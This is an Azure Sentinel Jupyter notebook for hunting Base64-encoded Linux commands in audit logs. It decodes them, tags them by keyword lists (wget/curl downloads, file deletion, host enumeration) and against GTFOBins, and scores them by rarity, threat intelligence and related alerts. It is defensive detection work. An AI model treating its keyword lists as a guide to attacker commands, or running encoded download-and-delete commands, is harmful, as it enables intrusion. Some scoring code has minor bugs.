Notebook Version: 1.0
Python Version: Python 3.6 (including Python 3.6 - AzureML)
Required Packages: kqlmagic, msticpy, pandas, numpy, matplotlib, networkx, seaborn, datetime, ipywidgets, ipython, dnspython, folium, maxminddb_geolite2, BeautifulSoup
Platforms Supported:
Data Sources Required:
This notebook is a collection of tools for detecting malicious behavior when commands are Base64-encoded. It allows you to specify a workspace and time frame and will score and rank Base64 commands within those bounds.
It utilizes multiple data sources, primarily focusing on Azure Sentinel Syslog data augmented by telemetry from the MSTIC research branch of the AUOMS audit collection tool. Make sure to install this agent and connect your virtual machines with Azure Sentinel before using this notebook. For more on this, please see this blog post.
This notebook also uses data from GTFOBins, a list of Unix binaries that can be exploited by attackers. These bash commands are labeled with preliminary functions that can help an investigator better understand what a command does.
Finally, we use TI intel from AlienVaultOTX, VirusTotal, and IBM XForce to highlight and emphasize certain Base64 commands.
The next cell:
This should complete without errors. If you encounter errors or warnings look at the following two notebooks:
If you are running in the Azure Sentinel Notebooks environment (Azure Notebooks or Azure ML) you can run live versions of these notebooks:
You may also need to do some additional configuration to successfully use functions such as Threat Intelligence service lookup and Geo IP lookup.
There are more details about this in the ConfiguringNotebookEnvironment
notebook and in these documents:
If you are unfamiliar with Jupyter notebooks, or want a more in-depth setup reference, check out these resources:
from pathlib import Path
from pathlib import Path
from IPython.display import display, HTML
REQ_PYTHON_VER = "3.6"
REQ_MSTICPY_VER = "1.0.0"
display(HTML("<h3>Starting Notebook setup...</h3>"))
if Path("./utils/nb_check.py").is_file():
from utils.nb_check import check_versions
check_versions(REQ_PYTHON_VER, REQ_MSTICPY_VER)
from msticpy.nbtools import nbinit
nbinit.init_notebook(namespace=globals());
Run the cells below to connect to your Log Analytics workspace. If you haven't already, please fill in the relevant information in msticpyconfig.yaml
. This file is found in the Azure Sentinel Notebooks folder this notebook is in. There is more information on how to do this in the Notebook Setup section above. You may need to restart the kernel after doing so and rerun any cells you've already run to update to the new information.
If you are unfamiliar with connecting to Log Analytics or want a more in-depth walkthrough, check out the Getting Started with Azure Sentinel Notebook.
# See if we have an Azure Sentinel Workspace defined in our config file.
# If not, let the user specify Workspace and Tenant IDs
ws_config = WorkspaceConfig()
if not ws_config.config_loaded:
ws_config.prompt_for_ws()
qry_prov = QueryProvider(data_environment="AzureSentinel")
print("done")
# Authenticate to Azure Sentinel workspace
qry_prov.connect(ws_config)
Run the cell below, then use the sliding bar that pops up to adjust the time frame in which you want the query to find Base64 commands.
query_times = nbwidgets.QueryTime(units='day',
max_before=20, max_after=1, before=3)
query_times.display()
The following cell queries all Base64 commands in your Log Analytics workspace during the given time frame and queries data from AUOMS_EXECVE logs, which are discussed in this blog post, which was mentioned earlier. This is the data the rest of the commands will run on. The query is written in KQL. If you would like to add additional information to the query results, you may do it here. Note that following cells rely on this output so the original columns must still be projected.
If you prefer to use a different log (not AUOMS_EXECVE), you may write your own query and will potentially have to edit certain values throughout the rest of the notebook to get the correct values and data frames.
pd.options.display.html.use_mathjax = False
query = "Syslog" + f""" | where TimeGenerated between (datetime({query_times.start}) .. datetime({query_times.end})) """ + r"""
| parse SyslogMessage with "type=" EventType " audit(" * "): " EventData
| project TimeGenerated, EventType, Computer, EventData
| where EventType == "AUOMS_EXECVE"
| parse EventData with * "cmdline=" Cmdline " containerid=" containerid
| where Cmdline has "base64" and Cmdline has "echo"
| where Cmdline matches regex "^(.*)([A-Za-z0-9])(.*)$"
| parse kind=regex Cmdline with * "echo\\s*(-n\\s)?\\\\?[\"']?" cmdextract "\\\\?[\"']?[\\s\"'$]"
| extend cmdextract= trim_end(@"(\\?)(\'?)(\s?)(\|)(\s?)(.*)(base64)(.*)",cmdextract)
| extend DecodedCommand=base64_decode_tostring(cmdextract)
| project TimeGenerated, Computer, Cmdline, DecodedCommand
"""
print("Collecting base64 queries...")
b64_df= qry_prov.exec_query(query)
b64_df
We will be categorizing commands in two ways: this cell categorizes commands by looking for commonly used commands we are aware of. The next section will use an open source compilation.
This cell categorizes each decoded Base64 command by functionality based on what bash commands are present in the decoded version. For example, commands with "wget" or "curl" in them are categorized as "Network connections/Downloading." Other categories include "File Manipulation", "Host Enumeration", and "File/Process deletion/killing."
This categorization is by no means exhaustive. Feel free to add commands and categories to our basic one.
# Network connections/downloading (wget, curl, urllib.urlopen)
# File manipulation (chmod, chattr, touch, cp, mv, ln, sed, awk, echo)
# Host enumeration (uname, grep … /proc/cpuinfo)
# File/process deletion/killing (rm, pkill)
# Archive/compression programs (tar, zip, gzip, bzip2, lzma, xz)
def categorize(cmds):
ret = []
for cmd in cmds:
categories = []
if ("wget" in cmd) or ("curl" in cmd) or ("urllib.urlopen" in cmd):
categories.append("network connections/downloading")
if ("chmod" in cmd) or ("chattr" in cmd) or ("touch" in cmd) or ("cp" in cmd) or ("mv" in cmd) or ("ln" in cmd) or ("sed" in cmd) or ("awk" in cmd) or ("echo" in cmd):
categories.append("file manipulation")
if ("uname" in cmd) or ("grep" in cmd) or ("/proc/cpuinfo" in cmd):
categories.append("host enumeration")
if ("rm" in cmd) or ("pkill" in cmd):
categories.append("file/process deletion/killing")
if ("tar" in cmd) or ("zip" in cmd) or ("gzip" in cmd) or ("bzip2" in cmd) or ("lzma" in cmd) or ("xz" in cmd):
categories.append("archive/compression programs")
ret.append(categories)
return ret
print("Categorizing commands...")
b64_df['Categories'] = categorize(b64_df['DecodedCommand'])
b64_df['Categories'] = b64_df['Categories'].apply(str) # For drop_duplicates to work
b64_df[["Computer", "DecodedCommand", "Categories"]].drop_duplicates()
This cell categorizes the commands based on GTFOBins. GTFOBins is a vetted collection of bash commands frequently exploited by attackers as well as a reference as to how those commands may be used. We are using it to find potentially exploited commands in the dataset and tag those with their corresponding functionalities.
Run the cell below to read about what each category means according to the GTFOBins website.
from requests import get
from bs4 import BeautifulSoup
# Get HTML content from GTFOBins Website
fn_url = 'https://gtfobins.github.io/functions/'
fn_response = get(fn_url)
fn_soup = BeautifulSoup(fn_response.text, 'html.parser')
function_names = fn_soup.find_all('dt', class_ = 'function-name')
function_descriptions = fn_soup.find_all('dd')
display(HTML("<h1>GTFOBins Functions</h1>"))
# Print function headings and descriptions
for fn in range(len(function_descriptions)):
display(HTML(f"<b>{function_names[fn].text}</b>: {function_descriptions[fn].text}<br>"))
The following cell tags commands with GTFOBins bins and functions and displays the dataframe again for viewing. You may click on the links in the 'GTFO Bins' column for easy access to the GTFOBins website and more information.
# Get GTFOBins bins from the website and create a list
print("Getting GTFO Bins...")
url = 'https://gtfobins.github.io/'
response = get(url)
gtfo_soup = BeautifulSoup(response.text, 'html.parser')
gtfo_cmds = gtfo_soup.find_all('a', class_ = 'bin-name')
gtfobinsList = [cmd.text for cmd in gtfo_cmds]
# Get the GTFO functions corresponding to each bin
print("Getting GTFO Functions...")
binsFunctions = []
for b in gtfobinsList:
bin_url = 'https://gtfobins.github.io/gtfobins/' + b
bin_response = get(bin_url)
bin_soup = BeautifulSoup(bin_response.text, 'html.parser')
bin_fnnames = bin_soup.find_all('h2', class_ = 'function-name')
names = [n.text for n in bin_fnnames]
binsFunctions.append(names)
# Create a dictionary where the keys are bins and the values are its functions
binsDict = dict(zip(gtfobinsList, binsFunctions))
# Return lists of bins and functions corresponding to each command
def getGtfoBins(cmds):
retBins = []
retFns = []
for cmd in cmds:
bins_matched = []
fns_matched = set()
for b in binsDict.keys():
if b in cmd:
bins_matched.append('<a href="https://gtfobins.github.io/gtfobins/' + b + '">' + b + '</a>')
fns_matched.update(binsDict[b])
retBins.append(bins_matched)
retFns.append(fns_matched)
return retBins, retFns
print("Tagging GTFOBins...")
GTFOResult = getGtfoBins(b64_df['DecodedCommand'])
print("Formatting result...")
b64_df['GTFO Bins'] = GTFOResult[0]
b64_df['GTFO Functions'] = GTFOResult[1]
b64_df['GTFO Bins'] = b64_df['GTFO Bins'].apply(str) # For drop_duplicates
b64_df['GTFO Functions'] = b64_df['GTFO Functions'].apply(str)
HTML(b64_df[[ 'GTFO Bins', 'GTFO Functions', 'Computer', 'DecodedCommand', 'Categories']].drop_duplicates().to_html(escape=False))
The following sections generate scores for each unique Base64 command based on criteria such as frequency of the command, severity of TI lookup results, and related commands run. Each score is added to the dataframe at the end, so you can view and rank each individually or by the aggregate score.
Scores are somewhat artificially created and are meant to help investigators understand and highlight commands that are more likely to be malicious. They do not represent any mathematical value and are not calculated in comparison to any particular number other than each other, where higher scores are more likely to be malicious commands.
The cell below creates a frequency score for each unique Base64 command by calculating (1 / # times command occured in the workspace). It then adds an additional score calculated by (1 / # times command occured in its host computer). Both of these scores are divided by 2 for normalization purposes.
This results in rarer commands getting higher scores.
# Calculate Frequency Scores for the given data frame column
def calcFreqScore(df):
return 1 / df
def num_unique(col):
return len(col.unique())
# Aggregate b64_df column
b64_analytics = b64_df[["TimeGenerated", "Computer", "DecodedCommand", "Categories", "GTFO Bins", "GTFO Functions"]].groupby("DecodedCommand").agg(
CommandCount=pd.NamedAgg(column="DecodedCommand", aggfunc="count"),
TotalHosts=pd.NamedAgg(column="Computer", aggfunc=num_unique),
Hostnames=pd.NamedAgg(column="Computer", aggfunc="unique"),
Categories= pd.NamedAgg(column="Categories", aggfunc="first"),
GTFOBins=pd.NamedAgg(column="GTFO Bins", aggfunc="first"),
GTFOFunctions=pd.NamedAgg(column="GTFO Functions", aggfunc="first"),
FirstSeen=pd.NamedAgg(column="TimeGenerated", aggfunc="min"),
LastSeen=pd.NamedAgg(column="TimeGenerated", aggfunc="max"),
).reset_index()
b64_analytics["FreqScore"] = calcFreqScore(b64_analytics["CommandCount"]) / 2
b64_analytics["FreqScore"] = b64_analytics["FreqScore"] + ((calcFreqScore(b64_analytics["TotalHosts"])) / 2)
b64_analytics["TotalScore"] = b64_analytics["FreqScore"]
# Display
display_cols = [
'TotalScore','FreqScore', 'DecodedCommand', 'CommandCount', 'TotalHosts',
'Hostnames', 'Categories', 'GTFOBins', 'GTFOFunctions', 'FirstSeen', 'LastSeen'
]
summary_df = (
b64_analytics[display_cols].sort_values("TotalScore", ascending=False).reset_index().drop(['index'], axis=1)
)
HTML(summary_df.to_html(escape=False))
The cell below extracts any IoCs from the decoded Base64 commands and adds them to the dataframe. It uses the MSTICpy IoC extraction features, which extract the following patterns:
If you want to look for an IoC pattern that is not included, here feel free to modify the MSTICpy class. See this link for more information.
ioc_extractor = IoCExtract()
ioc_df = ioc_extractor.extract(data=b64_analytics, columns=['DecodedCommand'])
if len(ioc_df):
display(HTML("<h3>IoC patterns found in process tree.</h3>"))
display(ioc_df)
Load and run TILookup on IoCs found. Make sure you configure msticpyconfig.yaml
with the appropriate TI sources. Check out the document below if you need help with this) process.
We highly encourage you to add TI sources, but if you don't have any (i.e. API keys from AlienVault OTX, IBM XForce, or VirusTotal) and don't want to make accounts, you can skip this section and go to directly to Related Alerts Scoring below. Your rankings will be based exclusively on frequency scores and related alerts scoring in this case.
The below code will print out your current TI Lookup configurations.
ti_lookup = TILookup()
ti_lookup.reload_providers()
if not ti_lookup.provider_status:
md_warn("You have no TI providers configured, please see the documentation link above.")
Choose which providers you would like to use during the TI lookup. You will need these to be configured on msticpyconfig.yaml
. Additional directions given above in the Notebook Setup section.
providers = [t.split(' - ', 1)[0] for t in ti_lookup.provider_status]
providers_ss = nbwidgets.SelectSubset(
providers,
default_selected=['OTX', 'VirusTotal', 'XForce']
)
You can choose IoCs you're interested in to look up or look up all of them for scoring. Scores will be based exclusively on the Severity column. The following cells will also print a TI dataframe with added information.
items = ioc_df["Observable"].values
ioc_ss = nbwidgets.SelectSubset(
items,
default_selected=items.all()
)
Run this cell to look up the selected IoCs above.
iocs_to_check = (ioc_df[ioc_df["Observable"].isin(ioc_ss.selected_items)]
[["IoCType", "Observable"]].drop_duplicates())
print("Looking up IoCs...")
ti_results = ti_lookup.lookup_iocs(data=iocs_to_check, obs_col="Observable", providers=providers_ss.selected_items)
ti_results
The following cell uses the most severe of the severity scores provided by the providers to add to each score. The more severe the IoC found, the higher the score the command will receive. Each unique IoC found will add to the score of that command.
# Define severity scores
sev_scores = {"information": 0, "low": 1, "medium": 1.5, "high": 3, "unknown":1}
# Calculate severity scores and add iocs to the data frame
def calc_severity(cmds):
ret_iocs = []
ret_scores =[]
for c in cmds:
c_iocs = set()
c_sev_score = []
for ioc in ioc_df['Observable']:
if ioc in c:
c_iocs.add(ioc)
for uniq_ioc in c_iocs:
sev_df = ti_results[ti_results['Ioc'].values == uniq_ioc]
# Add severities for selected providers
az_sev = ""
otx_sev = ""
vt_sev = ""
xf_sev = ""
if 'AzSTI' in providers_ss.selected_items:
az_sev = str(sev_df[sev_df['Provider'] == 'AzSTI']['Severity'])
if 'OTX' in providers_ss.selected_items:
otx_sev = str(sev_df[sev_df['Provider'] == 'OTX']['Severity'])
if 'VirusTotal' in providers_ss.selected_items:
vt_sev = str(sev_df[sev_df['Provider'] == 'VirusTotal']['Severity'])
if 'Xforce' in providers_ss.selected_items:
xf_sev = str(sev_df[sev_df['Provider'] == 'XForce']['Severity'])
# Add scores
if 'high' in otx_sev or 'high' in vt_sev or 'high' in xf_sev:
c_sev_score.append(sev_scores['high'])
elif 'medium' in otx_sev or 'medium' in vt_sev or 'medium' in xf_sev:
c_sev_score.append(sev_scores['medium'])
elif 'low' in otx_sev or 'low' in vt_sev or 'low' in xf_sev:
c_sev_score.append(sev_scores['low'])
elif 'info' in otx_sev or 'info' in vt_sev or 'info' in xf_sev:
c_sev_score.append(sev_scores['information'])
else:
c_sev_score.append(sev_scores['unknown'])
ret_iocs.append(c_iocs)
ret_scores.append(sum(c_sev_score))
return ret_iocs, ret_scores
ti_info = calc_severity(b64_analytics['DecodedCommand'])
b64_analytics['IoCsFound'] = ti_info[0]
b64_analytics['SevScore'] = ti_info[1]
b64_analytics['TotalScore'] += b64_analytics['SevScore']
display_cols = [
'TotalScore','SevScore','FreqScore', 'DecodedCommand', 'CommandCount', 'TotalHosts',
'Hostnames', 'Categories', 'GTFOBins', 'GTFOFunctions', 'FirstSeen', 'LastSeen'
]
summary_df = (
b64_analytics[display_cols].sort_values("TotalScore", ascending=False).reset_index().drop(['index'], axis=1)
)
HTML(summary_df.to_html(escape=False))
This section searches for any related Sentinel alerts on the hosts we've found Base64 commands on in the given time frame.
ra_query_times = nbwidgets.QueryTime(
units="day",
origin_time=query_times.origin_time,
max_before=28,
max_after=5,
before=5,
auto_display=True,
)
Points are added to the score depending on the severity of the alerts that occurred at this time. For example, high severity alerts around the Base64 commands will result in a higher score for those commands. Each unique alert's score is only added once. Alert information as well as timeline visualizations will also be printed out to provide context and enable further investigation. Be sure to scroll for information on all the hosts.
# Define alert scores
alert_scores = {"Informational": 0, "Low": 1, "Medium": 2, "High": 3}
# Create list of hosts to search for related alerts on
host_df = b64_df.groupby('Computer')
hosts = [h for h in host_df.groups]
def print_related_alerts(alertDict, entityType, entityName, df):
if len(alertDict) > 0:
display(
Markdown(
f"### Found {len(alertDict)} different alert types related to this {entityType} (`{entityName}`)"
)
)
for (k, v) in alertDict.items():
print(f"- {k}, # Alerts: {v}")
display(df)
else:
print(f"No alerts for {entityType} entity `{entityName}`")
host_alert_scores = []
for host in hosts:
alerts_found = []
related_alerts = qry_prov.SecurityAlert.list_related_alerts(
ra_query_times, host_name=host
)
if isinstance(related_alerts, pd.DataFrame) and not related_alerts.empty:
host_alert_items = (
related_alerts[["AlertName", "TimeGenerated"]]
.groupby("AlertName")
.TimeGenerated.agg("count")
.to_dict()
)
# Print related alerts in shorthand format
print_related_alerts(host_alert_items, "host", host, related_alerts)
if len(host_alert_items) > 1:
nbdisplay.display_timeline(
data=related_alerts, title="Alerts", source_columns=["AlertName"], height=200
)
# Add to Alert Scoring based on the severity of the found alerts
# Only adds each unique alert, not repeats
uniq_alerts_found = set(related_alerts['AlertName'].values)
for a in uniq_alerts_found:
sev = related_alerts[related_alerts['AlertName'] == a]['Severity'].values[0]
alerts_found.append(alert_scores[sev])
host_alert_scores.append(sum(alerts_found))
else:
display(Markdown("No related alerts found."))
# Add appropriate scores
final_alert_scores = []
for i in b64_analytics['Hostnames']:
alert_val = 0
for h in range(len(i)):
alert_val += host_alert_scores[h]
final_alert_scores.append(alert_val)
b64_analytics['AlertScore'] = final_alert_scores
b64_analytics['TotalScore'] += b64_analytics['AlertScore']
View the score again by running the cell below.
# If no TI Scores, add 0 as TI Score for each row
has_ti_scores = True
if 'SevScore' not in b64_analytics.keys():
b64_analytics['SevScore'] = 0
has_ti_scores = False
display_cols = [
'TotalScore','AlertScore', 'SevScore', 'FreqScore', 'DecodedCommand', 'CommandCount', 'TotalHosts',
'Hostnames', 'Categories', 'GTFOBins', 'GTFOFunctions', 'FirstSeen', 'LastSeen'
]
summary_df = (
b64_analytics[display_cols].sort_values("TotalScore", ascending=False).reset_index().drop(['index'], axis=1)
)
HTML(summary_df.to_html(escape=False))
Run the cell below to choose the columns you would like to view. You must select TotalScore for rankings to work.
column_names = b64_analytics.columns.values.tolist()
columns_included = nbwidgets.SelectSubset(
column_names,
default_selected=['TotalScore', 'FreqScore', 'AlertScore', 'SevScore', 'DecodedCommand', 'Categories']
)
Run this cell to display the columns you chose above. Score columns will be colored a certain amount of red to help you visualize what percent of the total score is made up of each type of score and how these compare with other command scores.
You can also choose to only view data with numerical columns over a given cutoff by selecting a column and choosing a cutoff point.
import ipywidgets as widgets
from ipywidgets import interact, interact_manual
# Get score colums and numerical columns to display
score_cols = ['TotalScore', 'FreqScore', 'SevScore', 'AlertScore']
numerical_cols = ['TotalScore', 'FreqScore', 'SevScore', 'CommandCount', 'TotalHosts']
display_cols = [col for col in columns_included.selected_items if col in numerical_cols]
subset_cols = [col for col in columns_included.selected_items if col in score_cols]
# Get all display columns in order
ordered_cols = ['TotalScore', 'FreqScore', 'SevScore', 'AlertScore', 'DecodedCommand', 'Categories', 'CommandCount', 'FirstSeen', 'LastSeen', 'TotalHosts']
final_cols = ordered_cols.copy()
for col in ordered_cols:
if col not in columns_included.selected_items:
final_cols.remove(col)
@interact(Column=(display_cols))
def show_articles_more_than(Column= 'TotalScore',
Cutoff=(0, max(b64_analytics['TotalScore']), 0.1)):
return b64_analytics[final_cols].sort_values('TotalScore', ascending=False).loc[b64_analytics[Column] > Cutoff].style.bar(subset=subset_cols, color="#d65f5f")
You can use the following bar chart to view the compositions of the scores in a visual manner. The horizontal axis represents the index of the command in the data frame, so you can reference the data frame above for context around any interesting data you see.
import matplotlib.pyplot as plt
fig, ax = plt.subplots(figsize=(12,10))
plt.xlabel('Index')
plt.ylabel('TotalScore')
display(b64_analytics[['FreqScore','SevScore', 'AlertScore']].plot(ax=ax, kind='bar', stacked=True))
This timeline visualizes when commands occurred to identify potential windows of activity.
nbdisplay.display_timeline(data=b64_df, source_columns=['DecodedCommand', 'Categories'])